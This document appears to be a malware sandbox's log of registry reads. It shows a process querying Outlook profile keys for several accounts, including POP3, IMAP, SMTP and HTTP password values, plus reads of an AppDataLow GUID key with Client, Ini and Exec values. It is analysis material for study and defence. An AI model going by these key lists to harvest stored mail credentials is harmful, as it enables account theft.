Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP Server URL False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTPMail User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTPMail Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTPMail Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = Email False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTP Server URL False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTPMail User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTPMail Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTPMail Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = Email False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTP Server URL False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTPMail User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTPMail Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTPMail Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = Email False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTP Server URL False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTPMail User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTPMail Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTPMail Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = Email False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTP Server URL False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTPMail User Name False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTPMail Server False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP User False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTPMail Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = LastTask, type = REG_NONE False 1
Read Value - data = Microsoft Url History Service True 1
Read Value - data = C:\Windows\System32\ieframe.dll True 1
Read Value - value_name = CacheLimit, type = REG_NONE True 3
Read Value - value_name = explorer.exe, type = REG_NONE False 2
Read Value - value_name = *, type = REG_NONE False 2
Read Value - value_name = explorer.exe, type = REG_NONE True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings value_name = ProxySettingsPerUser, type = REG_NONE False 1
Read Value - value_name = Enable False 1
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, type = REG_BINARY True 2
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Ini, type = REG_NONE False 2
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Exec, type = REG_NONE False 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace value_name = ValidateRegItems False 9
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace value_name = MonitorRegistry, data = 1 True 9
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace value_name = ValidateRegItems False 16
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace value_name = MonitorRegistry False 16
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached value_name = {9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} {000214E6-0000-0000-C000-000000000046} 0xFFFF, type = REG_NONE True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions value_name = HasFlushedShellExtCache, type = REG_NONE True 1
Read Value - data = Sync Center Folder True 1
Read Value - data = C:\Windows\System32\SyncCenter.dll True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace value_name = ValidateRegItems False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace value_name = MonitorRegistry False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders value_name = StorageDelegateSuppressionPolicy, type = REG_NONE True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders value_name = StorageDelegate, type = REG_NONE True 1
Read Value - data = Shell File System Folder True 1
Read Value - data = C:\Windows\system32\Windows.Storage.dll True 1
Read Value - value_name = UIStatus, type = REG_NONE True 1
Read Value - value_name = OnlyMember, type = REG_NONE True 1
Read Value - data = This PC True 1
